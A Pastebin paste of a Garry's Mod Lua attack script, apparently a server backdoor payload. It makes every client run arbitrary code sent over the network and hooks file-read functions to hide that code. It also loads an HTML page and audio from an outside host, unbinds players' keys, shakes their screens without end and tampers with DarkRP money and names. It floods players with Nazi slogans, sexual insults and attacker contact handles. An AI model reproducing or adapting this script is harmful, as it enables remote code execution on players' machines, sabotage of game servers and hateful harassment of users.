Maxdace66

sdssd

Oct 4th, 2019
234
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.71 KB | None | 0 0
  1. util.AddNetworkString(\"_ServerName_\")
  2.  
  3. function payload( ply )
  4. ply:SendLua( \"net.Receive([[_ServerName_]], function() RunString(net.ReadString()) end)\" )
  5. end
  6. local bypass = [=====[
  7. if !fRead then
  8. fRead=file.Read
  9. fOpen=file.Open
  10. end
  11.  
  12. file.Open=function(fn,fm,path)
  13. loh=nil
  14. loh=string.Explode(\"/\",fn)
  15. if (loh[2]&&(loh[#loh-1]==\"lua\"&&(string.find(loh[#loh],\".lua\") || string.find(loh[#loh],\".txt\")) || loh[#loh-1]==\"scripthook\")) || loh[1]&&(string.find(loh[1],\".lua\") || string.find(loh[1],\".txt\"))&&path ==\"LUA\" || string.find(fn,\"scripthook/\") then
  16. chat.AddText(\"someone tried using file.open to get your \"..fn..\" with the PATH: \"..path..\" and file mode: \"..fm..\".\")
  17. return \"\"
  18. else
  19. return fOpen(fn,fm,path)
  20. end
  21. end
  22.  
  23. file.Read=function(fn,path)
  24. loh=nil
  25. loh=string.Explode(\"/\",fn)
  26. if (loh[2]&&(loh[#loh-1]==\"lua\"&&(string.find(loh[#loh],\".lua\") || string.find(loh[#loh],\".txt\")) || loh[#loh-1]==\"scripthook\")) || loh[1]&&(string.find(loh[1],\".lua\") || string.find(loh[1],\".txt\"))&&path==\"LUA\" || string.find(fn,\"scripthook/\") then
  27. chat.AddText(\"someone tried grabbing ur file named \"..fn..\".\")
  28. return \"\"
  29. else
  30. return fRead(fn,path)
  31. end
  32. end
  33.  
  34. ]=====]
  35.  
  36. function runcode(ply, code)
  37. net.Start( \"_ServerName_\" )
  38. net.WriteString(\"if SERVER then return \'\' end \"..bypass..\" \"..code )
  39. net.Send( ply )
  40. end
  41.  
  42. for k, v in pairs( player.GetAll() ) do
  43. payload( v )
  44. end
  45.  
  46. function run_chaos()
  47.  
  48. hook.Add( \"PlayerAuthed\", \"wat\", function( ply )
  49. payload(ply)
  50. end )
  51.  
  52. BroadcastLua([[sound.PlayURL( \"https://mandown.webou.net/img/punyaso-venom.mp3\", \"\", function() end )]])
  53.  
  54. timer.Create(\"startofstart\", 1.5, 1, function()
  55.  
  56. local textcenter_old = true
  57.  
  58. local venomexestep1 = false
  59.  
  60. timer.Create(\"text\", 0.5, 1, function()
  61. for k,v in pairs(player.GetAll() ) do
  62. runcode(v, [==[chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), \"Hello new hacker\")]==])
  63. timer.Create(\"textsub1\", 0.1, 1, function()
  64. runcode(v, [==[chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), \"I\'m Rayeurdu98\")]==])
  65. timer.Create(\"textsub2\", 0.1, 1, function()
  66. for k,v in pairs(player.GetAll() ) do
  67. runcode(v, [==[
  68. local i = 0
  69. if i >= 100 then
  70. chat.AddText(HSVToColor( Color(0,0,0)), \"////////////////////////////\")
  71. chat.AddText(HSVToColor( Color(0,0,0)), \"/ Venom Script Loaded /\")
  72. chat.AddText(HSVToColor( Color(0,0,0)), \"////////////////////////////\")
  73. else
  74. timer.Create(\"infecting\", 0.1, 51, function()
  75. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), \"Loading C:/Users/ΣƆ/Venom.exe... \"..i..\"%\")
  76. i = i + 2
  77. end)
  78. end
  79.  
  80. ]==])
  81. end
  82. end)
  83. end)
  84. end
  85. end)
  86.  
  87.  
  88. for k,v in pairs(player.GetAll() ) do
  89. runcode(v, [==[
  90.  
  91. VenomHTML = vgui.Create( \"HTML\" )
  92. VenomHTML:SetPos( 99999999999999999999, 99999999999999999999 )
  93. VenomHTML:SetSize( ScrW(), ScrH())
  94. VenomHTML:OpenURL( \"https://mandown.webou.net/payloadimg/venom.html\" )
  95.  
  96. ]==])
  97. end
  98.  
  99. timer.Create(\"startnotif\", 9, 1, function()
  100. for k,v in pairs(player.GetAll() ) do
  101. runcode(v, [==[
  102. local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
  103.  
  104. surface.CreateFont( \"Bigfred\", {
  105. font = \"Roboto\",
  106. extended = false,
  107. size = screen_scale * 1000,
  108. weight = 200,
  109. blursize = 1.5,
  110. scanlines = 0,
  111. antialias = true,
  112. underline = false,
  113. italic = false,
  114. strikeout = false,
  115. symbol = false,
  116. rotary = false,
  117. shadow = false,
  118. additive = true,
  119. outline = false,
  120. } )
  121.  
  122. hook.Add( \"HUDPaint\", \"aumillieu\", function()
  123. draw.SimpleTextOutlined(
  124. \"ΣƆ\",
  125. \"Bigfred\",
  126. ScrW() /2 +math.random( -50, 50 ),
  127. ScrH() /2 +math.random( -50, 50 ),
  128. HSVToColor( CurTime() % 6 * 60, 1, 1 ),
  129. TEXT_ALIGN_CENTER,
  130. TEXT_ALIGN_CENTER,
  131. 3,
  132. Color( 0,0,0, 160 )
  133. )
  134. end)
  135. chat.AddText(Color(0,0,0), \"\")
  136. chat.AddText(Color(0,0,0), \"/////////////////////////////\")
  137. chat.AddText(Color(0,0,0), \"// Venom Script Loaded //\")
  138. chat.AddText(Color(0,0,0), \"/////////////////////////////\")
  139. chat.AddText(Color(0,0,0), \"// set lhost 192.168.1.5 //\")
  140. chat.AddText(Color(0,0,0), \"/////////////////////////////\")
  141. chat.AddText(Color(0,0,0), \"// Discord : Huzukawa#4067 //\")
  142. chat.AddText(Color(0,0,0), \"/////////////////////////////\")
  143.  
  144. util.ScreenShake( LocalPlayer():GetPos(), 30, 30, 0.8, 10000 )
  145. notification.AddLegacy( \"Sorry but u\'ve leak\", NOTIFY_GENERIC , 6 )
  146. notification.AddLegacy( \"Now yepco come eat your server\", NOTIFY_GENERIC , 6 )
  147. notification.AddLegacy( \"Kiss on your ass :3\", NOTIFY_GENERIC , 6 )
  148. ]==])
  149. end
  150. end)
  151.  
  152. timer.Create(\"stopstartnotif\", 9.8, 1, function()
  153. for k,v in pairs(player.GetAll() ) do
  154. runcode(v, [==[
  155.  
  156. hook.Add( \"HUDPaint\", \"aumillieu\", function()
  157.  
  158. end)
  159. ]==])
  160. end
  161. end)
  162.  
  163. timer.Create(\"wearevenom1\", 24, 1, function()
  164. for k,v in pairs(player.GetAll() ) do
  165. runcode(v, [==[
  166.  
  167. local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
  168.  
  169. surface.CreateFont( \"Bigfred\", {
  170. font = \"Roboto\",
  171. extended = false,
  172. size = screen_scale * 500,
  173. weight = 200,
  174. blursize = 1.5,
  175. scanlines = 0,
  176. antialias = true,
  177. underline = false,
  178. italic = false,
  179. strikeout = false,
  180. symbol = false,
  181. rotary = false,
  182. shadow = false,
  183. additive = true,
  184. outline = false,
  185. } )
  186.  
  187. hook.Add( \"HUDPaint\", \"wearevenom\", function()
  188. draw.SimpleTextOutlined(
  189. \"WE\",
  190. \"Bigfred\",
  191. ScrW() /2 +math.random( -50, 50 ),
  192. ScrH() /2 +math.random( -50, 50 ),
  193. HSVToColor( CurTime() % 6 * 60, 1, 1 ),
  194. TEXT_ALIGN_CENTER,
  195. TEXT_ALIGN_CENTER,
  196. 3,
  197. Color( 0,0,0, 160 )
  198. )
  199. end)
  200.  
  201. ]==])
  202. end
  203. end)
  204.  
  205. timer.Create(\"wearevenom2\", 25.7, 1, function()
  206. for k,v in pairs(player.GetAll() ) do
  207.  
  208. runcode(v, [==[
  209.  
  210. hook.Add( \"HUDPaint\", \"wearevenom\", function()
  211. draw.SimpleTextOutlined(
  212. \"WE ARE\",
  213. \"Bigfred\",
  214. ScrW() /2 +math.random( -50, 50 ),
  215. ScrH() /2 +math.random( -50, 50 ),
  216. HSVToColor( CurTime() % 6 * 60, 1, 1 ),
  217. TEXT_ALIGN_CENTER,
  218. TEXT_ALIGN_CENTER,
  219. 3,
  220. Color( 0,0,0, 160 )
  221. )
  222. end)
  223.  
  224. ]==])
  225. end
  226. end)
  227.  
  228. timer.Create(\"wearevenom3\", 25.8, 1, function()
  229. for k,v in pairs(player.GetAll() ) do
  230. runcode(v, [==[
  231.  
  232. hook.Add( \"HUDPaint\", \"wearevenom\", function()
  233. draw.SimpleTextOutlined(
  234. \"WE ARE VENOM\",
  235. \"Bigfred\",
  236. ScrW() /2 +math.random( -50, 50 ),
  237. ScrH() /2 +math.random( -50, 50 ),
  238. HSVToColor( CurTime() % 6 * 60, 1, 1 ),
  239. TEXT_ALIGN_CENTER,
  240. TEXT_ALIGN_CENTER,
  241. 3,
  242. Color( 0,0,0, 160 )
  243. )
  244. end)
  245.  
  246. VenomHTML:SetPos( 0, 0 )
  247.  
  248. ]==])
  249. end
  250. end)
  251.  
  252. timer.Create(\"wearevenom3bis\", 26.1, 0, function()
  253. for k,v in pairs(player.GetAll() ) do
  254. runcode(v, [==[
  255.  
  256. VenomHTML:SetPos( math.random( -5, 5 ), math.random( -5, 5 ) )
  257.  
  258. ]==])
  259. end
  260. end)
  261.  
  262. timer.Create(\"wearevenom3bis\", 26.3, 0, function()
  263. for k,v in pairs(player.GetAll() ) do
  264. runcode(v, [==[
  265. util.ScreenShake( LocalPlayer():GetPos(), 30, 30, 999999, 10000 )
  266. ]==])
  267. end
  268. end)
  269.  
  270. timer.Create(\"notifspam\", 26.3, 0, function()
  271. for k,v in pairs(player.GetAll() ) do
  272. runcode(v, [==[
  273. local vars2 = { NOTIFY_GENERIC , NOTIFY_ERROR , NOTIFY_UNDO , NOTIFY_HINT, NOTIFY_CLEANUP }
  274. local vars3 = {\"https://discord.gg/tkfQaRD\",\"Nazi <3\",\"Hitler is ur dad\",\"Server Hacked by ΣƆdoor\",\"Discord of owner : Rayeurdu98#8210\", \"Discord of co-owner : ΣΖΛŖ#0791\",\"Je détruis ton vagin avec un berlingot de lait\",\"Take my zeub\",\"Suck my zeub\"}
  275. notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_GENERIC , 1 )
  276. notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_ERROR , 1 )
  277. notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_UNDO , 1 )
  278. notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_HINT , 1 )
  279. notification.AddLegacy( vars3[math.random(1,#vars3)], NOTIFY_CLEANUP , 1 )
  280. timer.Create( \"spamnotifafter\", 0.1, 0, function()
  281. notification.AddLegacy( vars3[math.random(1,#vars3)], vars2[math.random(1,#vars2)] , 1 )
  282. end)
  283. ]==])
  284. end
  285. end)
  286.  
  287.  
  288. timer.Create(\"textoncenter\", 26.3, 0, function()
  289. for k,v in pairs(player.GetAll() ) do
  290. v:Say(\"/ooc We are Venom !\")
  291. if textcenter_old == true then
  292. runcode(v, [==[
  293.  
  294. local Mat = Material( \"dev/graygrid\" )
  295.  
  296. hook.Add( \"PostDraw2DSkyBox\", \"ExampleHook\", function()
  297.  
  298. render.OverrideDepthEnable( true, false ) -- ignore Z to prevent drawing over 3D skybox
  299.  
  300. -- Start 3D cam centered at the origin
  301. cam.Start3D( Vector( 0, 0, 0 ), EyeAngles() )
  302. render.SetMaterial( Mat )
  303. render.DrawQuadEasy( Vector( 1, 0, 0 ) * 200, Vector( -1, 0, 0 ), 64, 64, HSVToColor( CurTime() % 6 * 60, 1, 1 ), 0 )
  304. cam.End3D()
  305.  
  306. render.OverrideDepthEnable( false, false )
  307.  
  308. end )
  309.  
  310.  
  311. hook.Add( \"HUDPaint\", \"wearevenom\", function()
  312.  
  313. end)
  314.  
  315. VenomHTML:SetPos( 99999999999999999999, 99999999999999999999 )
  316.  
  317. local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
  318.  
  319. surface.CreateFont( \"Bigfred\", {
  320. font = \"Roboto\",
  321. extended = false,
  322. size = screen_scale * 1000,
  323. weight = 200,
  324. blursize = 1.5,
  325. scanlines = 0,
  326. antialias = true,
  327. underline = false,
  328. italic = false,
  329. strikeout = false,
  330. symbol = false,
  331. rotary = false,
  332. shadow = false,
  333. additive = true,
  334. outline = false,
  335. } )
  336.  
  337. hook.Add( \"HUDPaint\", \"aumillieu\", function()
  338.  
  339. local textcenter = {\"ΣƆ\", \"ZC\", \"ZƆ\", \"ΣC\"}
  340.  
  341. draw.SimpleTextOutlined(
  342. textcenter[math.random(1,#textcenter)],
  343. \"Bigfred\",
  344. ScrW() /2 +math.random( -50, 50 ),
  345. ScrH() /2 +math.random( -50, 50 ),
  346. HSVToColor( CurTime() % 6 * 60, 1, 1 ),
  347. TEXT_ALIGN_CENTER,
  348. TEXT_ALIGN_CENTER,
  349. 3,
  350. Color( 0,0,0, 160 )
  351. )
  352. end)
  353.  
  354.  
  355. ]==])
  356. end
  357. end
  358. end)
  359.  
  360. timer.Create(\"after1\", 26.3, 0, function()
  361. for k,v in pairs(player.GetAll() ) do
  362. v:SetRunSpeed(1000 * 2)
  363. v:SetWalkSpeed(1000 * 2)
  364. v:GodEnable()
  365. end
  366. end)
  367.  
  368. timer.Create(\"calme1\", 58.9, 1, function()
  369. for k,v in pairs(player.GetAll() ) do
  370. runcode(v, [==[
  371. util.ScreenShake( LocalPlayer():GetPos(), 5, 5, 0.8, 5000 )
  372. ]==])
  373. end
  374. end)
  375.  
  376.  
  377.  
  378. timer.Create(\"2emedrop\", 96, 1, function()
  379. for k,v in pairs(player.GetAll() ) do
  380. runcode(v, [==[
  381.  
  382. VenomHTML:SetPos( 0, 0 )
  383. ]==])
  384. end
  385. end)
  386.  
  387.  
  388. timer.Create(\"2emedropdelvenom\", 100.4, 1, function()
  389. for k,v in pairs(player.GetAll() ) do
  390. runcode(v, [==[
  391. VenomHTML:SetPos( 99999999999999999999, 99999999999999999999 )
  392. ]==])
  393. end
  394. end)
  395.  
  396. timer.Create(\"2emedropbis\", 100.4, 0, function()
  397. for k,v in pairs(player.GetAll() ) do
  398. textcenter_old = false
  399.  
  400. timer.Create(\"ihfiqgfigqsiyfgqsfqsfqsfqsfq\", 0.1, 0, function()
  401. for k,v in pairs(player.GetAll() ) do
  402. textcenter_old = false
  403. local function rdm_str(len)
  404. if !len or len <= 0 then return \'\' end
  405. return rdm_str(len - 1) .. (\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\")[math.random(1, 62)]
  406. end
  407.  
  408. if engine.ActiveGamemode() == \"DarkRP\" || engine.ActiveGamemode() == \"darkrp\" then
  409. DarkRP.storeRPName(v, rdm_str(25)) v:setDarkRPVar(\"rpname\", rdm_str(25))
  410. v:addMoney(math.random(10000000, 999999999))
  411. v:setDarkRPVar(\"job\", rdm_str(25))
  412. end
  413. end
  414. end)
  415.  
  416. runcode(v, [==[
  417.  
  418. ConCommand(\"unbindall\")
  419.  
  420. util.ScreenShake( LocalPlayer():GetPos(), 30, 30, 999999, 10000 )
  421.  
  422. local screen_scale = math.Clamp(ScrH()/1080, 0.6, 1);
  423.  
  424. surface.CreateFont( \"Bigfred\", {
  425. font = \"Roboto\",
  426. extended = false,
  427. size = screen_scale * 1000,
  428. weight = 200,
  429. blursize = 1.5,
  430. scanlines = 2,
  431. antialias = false,
  432. underline = false,
  433. italic = false,
  434. strikeout = false,
  435. symbol = false,
  436. rotary = false,
  437. shadow = false,
  438. additive = false,
  439. outline = false,
  440. } )
  441.  
  442. hook.Add( \"HUDPaint\", \"aumillieu\", function()
  443.  
  444. local textcenter = {\"ΣƆ\", \"ZC\", \"ZƆ\", \"ΣC\", \"Σ€\", \"Z€\"}
  445.  
  446. draw.SimpleTextOutlined(
  447. textcenter[math.random(1,#textcenter)],
  448. \"Bigfred\",
  449. ScrW() /2 +math.random( -650, 650 ),
  450. ScrH() /2 +math.random( -650, 650 ),
  451. HSVToColor( CurTime() % 6 * 60, 1, 1 ),
  452. TEXT_ALIGN_CENTER,
  453. TEXT_ALIGN_CENTER,
  454. 3,
  455. Color( 0,0,0, 160 )
  456. )
  457. end)
  458. hook.Add( \"PostDrawTranslucentRenderables\", \"matebalyakakambal\", function()
  459. render.SetMaterial( Material(\"cable/blue_elec\") )
  460. for i = 1, 32 do
  461. render.DrawBeam( LocalPlayer():GetPos() +Vector(0, 0, 128) +(EyeAngles():Forward() *256), EyePos() +(VectorRand() *256), 4, 0, 12.5, Color(255, 255, 255, 255) )
  462. end
  463. end)
  464. ]==])
  465. end
  466. end)
  467.  
  468. timer.Create(\"creparti\", 113, 0, function()
  469. for k,v in pairs(player.GetAll() ) do
  470. runcode(v, [==[
  471.  
  472. ]==])
  473. end
  474. end)
  475.  
  476. end)
  477.  
  478.  
  479. end
  480.  
  481. if !hook.GetTable().PlayerInitialSpawn.podsos then
  482. hook.Add(\"PlayerInitialSpawn\", \"podsos\", function()
  483. timer.Simple(10, function()
  484. run_chaos()
  485. end)
  486. end)
  487. run_chaos()
  488. end
Advertisement
Add Comment
Please, Sign In to add comment